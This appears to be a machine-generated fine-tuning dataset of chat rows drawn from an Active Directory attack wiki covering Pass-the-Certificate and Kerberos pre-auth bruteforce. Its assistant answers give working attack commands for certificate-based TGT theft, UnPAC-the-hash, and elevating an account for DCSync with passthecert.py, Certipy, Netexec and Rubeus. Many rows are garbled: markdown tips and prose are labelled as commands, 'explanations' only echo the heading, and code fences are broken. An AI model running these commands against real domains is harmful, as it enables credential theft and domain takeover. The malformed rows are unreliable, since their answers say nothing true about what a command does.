syntax."}, {"role": "user", "content": "How would I carry out PEM certificate (file) + PEM private key (file) during a pentest?"}, {"role": "assistant", "content": "gettgtpkinit.py -cert-pem \"PATH_TO_PEM_CERT\" -key-pem \"PATH_TO_PEM_KEY\" \"FQDN_DOMAIN/TARGET_SAMNAME\" \"TGT_CCACHE_FILE\"\n``\n\nAlternatively, Certipy (Python) can be used for the same purpose.\n\n`bash\ncertipy auth -pfx \"PATH_TO_PFX_CERT\" -password \"CERT_PASSWORD\" -dc-ip 'dc-ip' -username 'user' -domain 'domain'\n`\n\n> [!TIP]\n> Older Certipy's version don't support PFXs with password. The following command can be used to \"unprotect\" a PFX file.\n>\n> `bash\n> certipy cert -export -pfx \"PATH_TO_PFX_CERT\" -password \"CERT_PASSWORD\" -out \"unprotected.pfx\"\n> `\n\nThe ticket obtained can then be used to\n\n* authenticate with pass-the-cache\n* conduct an UnPAC-the-hash attack. This can be done with getnthash.py from PKINITtools.\n* obtain access to the account's SPN with an S4U2Self. This can be done with gets4uticket.py from PKINITtools.\n\n> [!TIP]\n> When using Certipy for Pass-the-Certificate, it automatically does UnPAC-the-hash to recover the account's NT hash, in addition to saving the TGT obtained.\n\nAnother alternative is with PassTheCert (Python) which can be used to conduct multiple techniques like elevate a user for dcsync.md or change password for a specific user.\n\n``bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out PEM certificate (file) + PEM private key (file) during a pentest?", "response": "gettgtpkinit.py -cert-pem \"PATH_TO_PEM_CERT\" -key-pem \"PATH_TO_PEM_KEY\" \"FQDN_DOMAIN/TARGET_SAMNAME\" \"TGT_CCACHE_FILE\"\n``\n\nAlternatively, Certipy (Python) can be used for the same purpose.\n\n`bash\ncertipy auth -pfx \"PATH_TO_PFX_CERT\" -password \"CERT_PASSWORD\" -dc-ip 'dc-ip' -username 'user' -domain 'domain'\n`\n\n> [!TIP]\n> Older Certipy's version don't support PFXs with password. The following command can be used to \"unprotect\" a PFX file.\n>\n> `bash\n> certipy cert -export -pfx \"PATH_TO_PFX_CERT\" -password \"CERT_PASSWORD\" -out \"unprotected.pfx\"\n> `\n\nThe ticket obtained can then be used to\n\n* authenticate with pass-the-cache\n* conduct an UnPAC-the-hash attack. This can be done with getnthash.py from PKINITtools.\n* obtain access to the account's SPN with an S4U2Self. This can be done with gets4uticket.py from PKINITtools.\n\n> [!TIP]\n> When using Certipy for Pass-the-Certificate, it automatically does UnPAC-the-hash to recover the account's NT hash, in addition to saving the TGT obtained.\n\nAnother alternative is with PassTheCert (Python) which can be used to conduct multiple techniques like elevate a user for dcsync.md or change password for a specific user.\n\n``bash", "metadata": {"corpus_index": 650, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/pass-the-certificate.md", "page_title": "Pass the Certificate", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for PEM certificate (file) + PEM private key (file)"}, {"role": "assistant", "content": "Alternatively, [Certipy](https://github.com/ly4k/Certipy) (Python) can be used for the same purpose."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for PEM certificate (file) + PEM private key (file)", "response": "Alternatively, [Certipy](https://github.com/ly4k/Certipy) (Python) can be used for the same purpose.", "metadata": {"corpus_index": 651, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/pass-the-certificate.md", "page_title": "Pass the Certificate", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Alternatively, [Certipy](https://github.com/ly4k/Certipy) (Python) can be used for the same purpose.`?"}, {"role": "assistant", "content": "This command is used for pem certificate (file) + pem private key (file). PEM certificate (file) + PEM private key (file)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Alternatively, [Certipy](https://github.com/ly4k/Certipy) (Python) can be used for the same purpose.`?", "response": "This command is used for pem certificate (file) + pem private key (file). PEM certificate (file) + PEM private key (file)", "metadata": {"corpus_index": 651, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/pass-the-certificate.md", "page_title": "Pass the Certificate", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through PEM certificate (file) + PEM private key (file)"}, {"role": "assistant", "content": "> [!TIP]\n> Older Certipy's version don't support PFXs with password. The following command can be used to \"unprotect\" a PFX file.\n>\n> ```bash\n> certipy cert -export -pfx \"PATH_TO_PFX_CERT\" -password \"CERT_PASSWORD\" -out \"unprotected.pfx\"\n> ```\n\nThe ticket obtained can then be used to\n\n* authenticate with [pass-the-cache](ptc.md)\n* conduct an [UnPAC-the-hash](unpac-the-hash.md) attack. This can be done with [getnthash.py](https://github.com/dirkjanm/PKINITtools/blob/master/getnthash.py) from [PKINITtools](https://github.com/dirkjanm/PKINITtools/).\n* obtain access to the account's SPN with an S4U2Self. This can be done with [gets4uticket.py](https://github.com/dirkjanm/PKINITtools/blob/master/gets4uticket.py) from [PKINITtools](https://github.com/dirkjanm/PKINITtools).\n\n> [!TIP]\n> When using Certipy for Pass-the-Certificate, it automatically does [UnPAC-the-hash](unpac-the-hash.md) to recover the account's NT hash, in addition to saving the TGT obtained.\n\nAnother alternative is with [PassTheCert](https://github.com/AlmondOffSec/PassTheCert/blob/main/Python/passthecert.py) (Python) which can be used to conduct multiple techniques like elevate a user for [dcsync.md](../credentials/dumping/dcsync.md) or change password for a specific user."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through PEM certificate (file) + PEM private key (file)", "response": "> [!TIP]\n> Older Certipy's version don't support PFXs with password. The following command can be used to \"unprotect\" a PFX file.\n>\n> ```bash\n> certipy cert -export -pfx \"PATH_TO_PFX_CERT\" -password \"CERT_PASSWORD\" -out \"unprotected.pfx\"\n> ```\n\nThe ticket obtained can then be used to\n\n* authenticate with [pass-the-cache](ptc.md)\n* conduct an [UnPAC-the-hash](unpac-the-hash.md) attack. This can be done with [getnthash.py](https://github.com/dirkjanm/PKINITtools/blob/master/getnthash.py) from [PKINITtools](https://github.com/dirkjanm/PKINITtools/).\n* obtain access to the account's SPN with an S4U2Self. This can be done with [gets4uticket.py](https://github.com/dirkjanm/PKINITtools/blob/master/gets4uticket.py) from [PKINITtools](https://github.com/dirkjanm/PKINITtools).\n\n> [!TIP]\n> When using Certipy for Pass-the-Certificate, it automatically does [UnPAC-the-hash](unpac-the-hash.md) to recover the account's NT hash, in addition to saving the TGT obtained.\n\nAnother alternative is with [PassTheCert](https://github.com/AlmondOffSec/PassTheCert/blob/main/Python/passthecert.py) (Python) which can be used to conduct multiple techniques like elevate a user for [dcsync.md](../credentials/dumping/dcsync.md) or change password for a specific user.", "metadata": {"corpus_index": 652, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/pass-the-certificate.md", "page_title": "Pass the Certificate", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `> [!TIP]`?"}, {"role": "assistant", "content": "This command is used for pem certificate (file) + pem private key (file). PEM certificate (file) + PEM private key (file)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `> [!TIP]`?", "response": "This command is used for pem certificate (file) + pem private key (file). PEM certificate (file) + PEM private key (file)", "metadata": {"corpus_index": 652, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/pass-the-certificate.md", "page_title": "Pass the Certificate", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about extract key and cert from the pfx"}, {"role": "assistant", "content": "certipy cert -pfx \"PATH_TO_PFX_CERT\" -nokey -out \"user.crt\"\ncertipy cert -pfx \"PATH_TO_PFX_CERT\" -nocert -out \"user.key\""}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about extract key and cert from the pfx", "response": "certipy cert -pfx \"PATH_TO_PFX_CERT\" -nokey -out \"user.crt\"\ncertipy cert -pfx \"PATH_TO_PFX_CERT\" -nocert -out \"user.key\"", "metadata": {"corpus_index": 653, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/pass-the-certificate.md", "page_title": "Pass the Certificate", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute extract key and cert from the pfx?"}, {"role": "assistant", "content": "certipy cert -pfx \"PATH_TO_PFX_CERT\" -nokey -out \"user.crt\"\ncertipy cert -pfx \"PATH_TO_PFX_CERT\" -nocert -out \"user.key\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute extract key and cert from the pfx?", "response": "certipy cert -pfx \"PATH_TO_PFX_CERT\" -nokey -out \"user.crt\"\ncertipy cert -pfx \"PATH_TO_PFX_CERT\" -nocert -out \"user.key\"", "metadata": {"corpus_index": 653, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/pass-the-certificate.md", "page_title": "Pass the Certificate", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about elevate a user for DCSYNC with passthecert.py?"}, {"role": "assistant", "content": "passthecert.py -action modify_user -crt \"PATH_TO_CRT\" -key \"PATH_TO_KEY\" -domain \"domain.local\" -dc-ip \"DC_IP\" -target \"SAM_ACCOUNT_NAME\" -elevate\n``\n\nYou can also use Netexec to perform Pass-the-Certificate authentication:\n\n`bash\nnetexec --pfx-cert \"PATH_TO_PFX_CERT\" -u user \nnetexec --pfx-cert \"PATH_TO_PFX_CERT\" --pfx-pass \"CERT_PASSWORD\" -u user \nnetexec --pfx-base64 \"PATH_TO_PFX_CERT\" -u user \nnetexec --pem-cert \"PATH_TO_CRT\" --pem-key \"PATH_TO_KEY\" -u user \n`\n\n=== Windows\n\nFrom Windows systems, Rubeus (C#) can be used to request a TGT (Ticket Granting Ticket) for the target object from a base64-encoded PFX certificate export (with an optional password).\n\n`powershell\nRubeus.exe asktgt /user:\"TARGET_SAMNAME\" /certificate:\"BASE64_CERTIFICATE\" /password:\"CERTIFICATE_PASSWORD\" /domain:\"FQDN_DOMAIN\" /dc:\"DOMAIN_CONTROLLER\" /show\n`\n\n> [!TIP]\n> PEM certificates can be exported to a PFX format with openssl. Rubeus doesn't handle PEM certificates.\n> \n> `bash\n> openssl pkcs12 -in \"cert.pem\" -keyex -CSP \"Microsoft Enhanced Cryptographic Provider v1.0\" -export -out \"cert.pfx\"\n> `\n\n> [!TIP]\n> Certipy uses DER encryption. To generate a PFX for Rubeus, openssl can be used.\n> \n> `bash\n> openssl rsa -inform DER -in key.key -out key-pem.key\n> openssl x509 -inform DER -in cert.crt -out cert.pem -outform PEM\n> openssl pkcs12 -in cert.pem -inkey key-pem.key -export -out cert.pfx\n> `\n>\n> > [!TIP]\n> To generate a b64 for Rubeus:\n> \n> `powershell\n> $pfx_cert = get-content 'c:\\cert.pfx' -Encoding Byte\n> $base64 = [System.Convert]::ToBase64String($pfx_cert)\n> $base64\n> `\n\nThe ticket obtained can then be used to\n\n* authenticate with pass-the-ticket\n* conduct an UnPAC-the-hash attack (add the /getcredentials` flag to Rubeus's asktgt command)\n* obtain access to the account's SPN with an S4U2Self.\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about elevate a user for DCSYNC with passthecert.py?", "response": "passthecert.py -action modify_user -crt \"PATH_TO_CRT\" -key \"PATH_TO_KEY\" -domain \"domain.local\" -dc-ip \"DC_IP\" -target \"SAM_ACCOUNT_NAME\" -elevate\n``\n\nYou can also use Netexec to perform Pass-the-Certificate authentication:\n\n`bash\nnetexec --pfx-cert \"PATH_TO_PFX_CERT\" -u user \nnetexec --pfx-cert \"PATH_TO_PFX_CERT\" --pfx-pass \"CERT_PASSWORD\" -u user \nnetexec --pfx-base64 \"PATH_TO_PFX_CERT\" -u user \nnetexec --pem-cert \"PATH_TO_CRT\" --pem-key \"PATH_TO_KEY\" -u user \n`\n\n=== Windows\n\nFrom Windows systems, Rubeus (C#) can be used to request a TGT (Ticket Granting Ticket) for the target object from a base64-encoded PFX certificate export (with an optional password).\n\n`powershell\nRubeus.exe asktgt /user:\"TARGET_SAMNAME\" /certificate:\"BASE64_CERTIFICATE\" /password:\"CERTIFICATE_PASSWORD\" /domain:\"FQDN_DOMAIN\" /dc:\"DOMAIN_CONTROLLER\" /show\n`\n\n> [!TIP]\n> PEM certificates can be exported to a PFX format with openssl. Rubeus doesn't handle PEM certificates.\n> \n> `bash\n> openssl pkcs12 -in \"cert.pem\" -keyex -CSP \"Microsoft Enhanced Cryptographic Provider v1.0\" -export -out \"cert.pfx\"\n> `\n\n> [!TIP]\n> Certipy uses DER encryption. To generate a PFX for Rubeus, openssl can be used.\n> \n> `bash\n> openssl rsa -inform DER -in key.key -out key-pem.key\n> openssl x509 -inform DER -in cert.crt -out cert.pem -outform PEM\n> openssl pkcs12 -in cert.pem -inkey key-pem.key -export -out cert.pfx\n> `\n>\n> > [!TIP]\n> To generate a b64 for Rubeus:\n> \n> `powershell\n> $pfx_cert = get-content 'c:\\cert.pfx' -Encoding Byte\n> $base64 = [System.Convert]::ToBase64String($pfx_cert)\n> $base64\n> `\n\nThe ticket obtained can then be used to\n\n* authenticate with pass-the-ticket\n* conduct an UnPAC-the-hash attack (add the /getcredentials` flag to Rubeus's asktgt command)\n* obtain access to the account's SPN with an S4U2Self.\n\n:::", "metadata": {"corpus_index": 654, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/pass-the-certificate.md", "page_title": "Pass the Certificate", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform elevate a user for DCSYNC with passthecert.py?"}, {"role": "assistant", "content": "passthecert.py -action modify_user -crt \"PATH_TO_CRT\" -key \"PATH_TO_KEY\" -domain \"domain.local\" -dc-ip \"DC_IP\" -target \"SAM_ACCOUNT_NAME\" -elevate\n``\n\nYou can also use Netexec to perform Pass-the-Certificate authentication:\n\n`bash\nnetexec --pfx-cert \"PATH_TO_PFX_CERT\" -u user \nnetexec --pfx-cert \"PATH_TO_PFX_CERT\" --pfx-pass \"CERT_PASSWORD\" -u user \nnetexec --pfx-base64 \"PATH_TO_PFX_CERT\" -u user \nnetexec --pem-cert \"PATH_TO_CRT\" --pem-key \"PATH_TO_KEY\" -u user \n`\n\n=== Windows\n\nFrom Windows systems, Rubeus (C#) can be used to request a TGT (Ticket Granting Ticket) for the target object from a base64-encoded PFX certificate export (with an optional password).\n\n`powershell\nRubeus.exe asktgt /user:\"TARGET_SAMNAME\" /certificate:\"BASE64_CERTIFICATE\" /password:\"CERTIFICATE_PASSWORD\" /domain:\"FQDN_DOMAIN\" /dc:\"DOMAIN_CONTROLLER\" /show\n`\n\n> [!TIP]\n> PEM certificates can be exported to a PFX format with openssl. Rubeus doesn't handle PEM certificates.\n> \n> `bash\n> openssl pkcs12 -in \"cert.pem\" -keyex -CSP \"Microsoft Enhanced Cryptographic Provider v1.0\" -export -out \"cert.pfx\"\n> `\n\n> [!TIP]\n> Certipy uses DER encryption. To generate a PFX for Rubeus, openssl can be used.\n> \n> `bash\n> openssl rsa -inform DER -in key.key -out key-pem.key\n> openssl x509 -inform DER -in cert.crt -out cert.pem -outform PEM\n> openssl pkcs12 -in cert.pem -inkey key-pem.key -export -out cert.pfx\n> `\n>\n> > [!TIP]\n> To generate a b64 for Rubeus:\n> \n> `powershell\n> $pfx_cert = get-content 'c:\\cert.pfx' -Encoding Byte\n> $base64 = [System.Convert]::ToBase64String($pfx_cert)\n> $base64\n> `\n\nThe ticket obtained can then be used to\n\n* authenticate with pass-the-ticket\n* conduct an UnPAC-the-hash attack (add the /getcredentials` flag to Rubeus's asktgt command)\n* obtain access to the account's SPN with an S4U2Self.\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform elevate a user for DCSYNC with passthecert.py?", "response": "passthecert.py -action modify_user -crt \"PATH_TO_CRT\" -key \"PATH_TO_KEY\" -domain \"domain.local\" -dc-ip \"DC_IP\" -target \"SAM_ACCOUNT_NAME\" -elevate\n``\n\nYou can also use Netexec to perform Pass-the-Certificate authentication:\n\n`bash\nnetexec --pfx-cert \"PATH_TO_PFX_CERT\" -u user \nnetexec --pfx-cert \"PATH_TO_PFX_CERT\" --pfx-pass \"CERT_PASSWORD\" -u user \nnetexec --pfx-base64 \"PATH_TO_PFX_CERT\" -u user \nnetexec --pem-cert \"PATH_TO_CRT\" --pem-key \"PATH_TO_KEY\" -u user \n`\n\n=== Windows\n\nFrom Windows systems, Rubeus (C#) can be used to request a TGT (Ticket Granting Ticket) for the target object from a base64-encoded PFX certificate export (with an optional password).\n\n`powershell\nRubeus.exe asktgt /user:\"TARGET_SAMNAME\" /certificate:\"BASE64_CERTIFICATE\" /password:\"CERTIFICATE_PASSWORD\" /domain:\"FQDN_DOMAIN\" /dc:\"DOMAIN_CONTROLLER\" /show\n`\n\n> [!TIP]\n> PEM certificates can be exported to a PFX format with openssl. Rubeus doesn't handle PEM certificates.\n> \n> `bash\n> openssl pkcs12 -in \"cert.pem\" -keyex -CSP \"Microsoft Enhanced Cryptographic Provider v1.0\" -export -out \"cert.pfx\"\n> `\n\n> [!TIP]\n> Certipy uses DER encryption. To generate a PFX for Rubeus, openssl can be used.\n> \n> `bash\n> openssl rsa -inform DER -in key.key -out key-pem.key\n> openssl x509 -inform DER -in cert.crt -out cert.pem -outform PEM\n> openssl pkcs12 -in cert.pem -inkey key-pem.key -export -out cert.pfx\n> `\n>\n> > [!TIP]\n> To generate a b64 for Rubeus:\n> \n> `powershell\n> $pfx_cert = get-content 'c:\\cert.pfx' -Encoding Byte\n> $base64 = [System.Convert]::ToBase64String($pfx_cert)\n> $base64\n> `\n\nThe ticket obtained can then be used to\n\n* authenticate with pass-the-ticket\n* conduct an UnPAC-the-hash attack (add the /getcredentials` flag to Rubeus's asktgt command)\n* obtain access to the account's SPN with an S4U2Self.\n\n:::", "metadata": {"corpus_index": 654, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/pass-the-certificate.md", "page_title": "Pass the Certificate", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the You syntax for elevate a user for dcsync with passthecert.py?"}, {"role": "assistant", "content": "You can also use [Netexec](https://github.com/Pennyw0rth/NetExec) to perform Pass-the-Certificate authentication:"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the You syntax for elevate a user for dcsync with passthecert.py?", "response": "You can also use [Netexec](https://github.com/Pennyw0rth/NetExec) to perform Pass-the-Certificate authentication:", "metadata": {"corpus_index": 655, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/pass-the-certificate.md", "page_title": "Pass the Certificate", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "You"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out elevate a user for DCSYNC with passthecert.py during a pentest?"}, {"role": "assistant", "content": "You can also use [Netexec](https://github.com/Pennyw0rth/NetExec) to perform Pass-the-Certificate authentication:"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out elevate a user for DCSYNC with passthecert.py during a pentest?", "response": "You can also use [Netexec](https://github.com/Pennyw0rth/NetExec) to perform Pass-the-Certificate authentication:", "metadata": {"corpus_index": 655, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/pass-the-certificate.md", "page_title": "Pass the Certificate", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `You can also use [Netexec](https://github.com/Pennyw0rth/NetExec) to perform Pass-the-Certificate authentication:`?"}, {"role": "assistant", "content": "This command is used for elevate a user for dcsync with passthecert.py. elevate a user for DCSYNC with passthecert.py"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `You can also use [Netexec](https://github.com/Pennyw0rth/NetExec) to perform Pass-the-Certificate authentication:`?", "response": "This command is used for elevate a user for dcsync with passthecert.py. elevate a user for DCSYNC with passthecert.py", "metadata": {"corpus_index": 655, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/pass-the-certificate.md", "page_title": "Pass the Certificate", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform elevate a user for DCSYNC with passthecert.py?"}, {"role": "assistant", "content": "=== Windows\n\nFrom Windows systems, [Rubeus](https://github.com/GhostPack/Rubeus) (C#) can be used to request a TGT (Ticket Granting Ticket) for the target object from a base64-encoded PFX certificate export (with an optional password)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform elevate a user for DCSYNC with passthecert.py?", "response": "=== Windows\n\nFrom Windows systems, [Rubeus](https://github.com/GhostPack/Rubeus) (C#) can be used to request a TGT (Ticket Granting Ticket) for the target object from a base64-encoded PFX certificate export (with an optional password).", "metadata": {"corpus_index": 656, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/pass-the-certificate.md", "page_title": "Pass the Certificate", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `=== Windows`?"}, {"role": "assistant", "content": "This command is used for elevate a user for dcsync with passthecert.py. elevate a user for DCSYNC with passthecert.py"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `=== Windows`?", "response": "This command is used for elevate a user for dcsync with passthecert.py. elevate a user for DCSYNC with passthecert.py", "metadata": {"corpus_index": 656, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/pass-the-certificate.md", "page_title": "Pass the Certificate", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Pre-auth bruteforce - Theory?"}, {"role": "assistant", "content": "The Kerberos authentication protocol works with tickets in order to grant access. A ST (Service Ticket) can be obtained by presenting a TGT (Ticket Granting Ticket). That prior TGT can only be obtained by validating a first step named \"pre-authentication\" (except if that requirement is explicitly removed for some accounts, making them vulnerable to ASREProast).\n\nThe pre-authentication requires the requesting user to supply its secret key (DES, RC4, AES128 or AES256) derived from his password. An attacker knowing that secret key doesn't need knowledge of the actual password to obtain tickets. This is called pass-the-key.\n\nSometimes, the pre-authentication is disabled on some accounts. The attacker can then obtain information encrypted with the account's key. While the obtained TGT cannot be used since it's encrypted with a key the attacker has no knowledge of, the encrypted information can be used to bruteforce the account's password. This is called ASREProast.\n\nLast but not least, the pre-authentication step can be bruteforced. This type of credential bruteforcing is way faster and stealthier than other bruteforcing methods relying on NTLM. Pre-authentication bruteforcing can even be faster by using UDP as the transport protocol, hence requiring less frames to be sent.\n\nOn a side note, it is possible to enumerate domain users in a similar manner."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Pre-auth bruteforce - Theory?", "response": "The Kerberos authentication protocol works with tickets in order to grant access. A ST (Service Ticket) can be obtained by presenting a TGT (Ticket Granting Ticket). That prior TGT can only be obtained by validating a first step named \"pre-authentication\" (except if that requirement is explicitly removed for some accounts, making them vulnerable to ASREProast).\n\nThe pre-authentication requires the requesting user to supply its secret key (DES, RC4, AES128 or AES256) derived from his password. An attacker knowing that secret key doesn't need knowledge of the actual password to obtain tickets. This is called pass-the-key.\n\nSometimes, the pre-authentication is disabled on some accounts. The attacker can then obtain information encrypted with the account's key. While the obtained TGT cannot be used since it's encrypted with a key the attacker has no knowledge of, the encrypted information can be used to bruteforce the account's password. This is called ASREProast.\n\nLast but not least, the pre-authentication step can be bruteforced. This type of credential bruteforcing is way faster and stealthier than other bruteforcing methods relying on NTLM. Pre-authentication bruteforcing can even be faster by using UDP as the transport protocol, hence requiring less frames to be sent.\n\nOn a side note, it is possible to enumerate domain users in a similar manner.", "metadata": {"corpus_index": 657, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/pre-auth-bruteforce.md", "page_title": "Pre-auth bruteforce", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Pre-auth bruteforce - Theory during a pentest?"}, {"role": "assistant", "content": "The Kerberos authentication protocol works with tickets in order to grant access. A ST (Service Ticket) can be obtained by presenting a TGT (Ticket Granting Ticket). That prior TGT can only be obtained by validating a first step named \"pre-authentication\" (except if that requirement is explicitly removed for some accounts, making them vulnerable to ASREProast).\n\nThe pre-authentication requires the requesting user to supply its secret key (DES, RC4, AES128 or AES256) derived from his password. An attacker knowing that secret key doesn't need knowledge of the actual password to obtain tickets. This is called pass-the-key.\n\nSometimes, the pre-authentication is disabled on some accounts. The attacker can then obtain information encrypted with the account's key. While the obtained TGT cannot be used since it's encrypted with a key the attacker has no knowledge of, the encrypted information can be used to bruteforce the account's password. This is called ASREProast.\n\nLast but not least, the pre-authentication step can be bruteforced. This type of credential bruteforcing is way faster and stealthier than other bruteforcing methods relying on NTLM. Pre-authentication bruteforcing can even be faster by using UDP as the transport protocol, hence requiring less frames to be sent.\n\nOn a side note, it is possible to enumerate domain users in a similar manner."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Pre-auth bruteforce - Theory during a pentest?", "response": "The Kerberos authentication protocol works with tickets in order to grant access. A ST (Service Ticket) can be obtained by presenting a TGT (Ticket Granting Ticket). That prior TGT can only be obtained by validating a first step named \"pre-authentication\" (except if that requirement is explicitly removed for some accounts, making them vulnerable to ASREProast).\n\nThe pre-authentication requires the requesting user to supply its secret key (DES, RC4, AES128 or AES256) derived from his password. An attacker knowing that secret key doesn't need knowledge of the actual password to obtain tickets. This is called pass-the-key.\n\nSometimes, the pre-authentication is disabled on some accounts. The attacker can then obtain information encrypted with the account's key. While the obtained TGT cannot be used since it's encrypted with a key the attacker has no knowledge of, the encrypted information can be used to 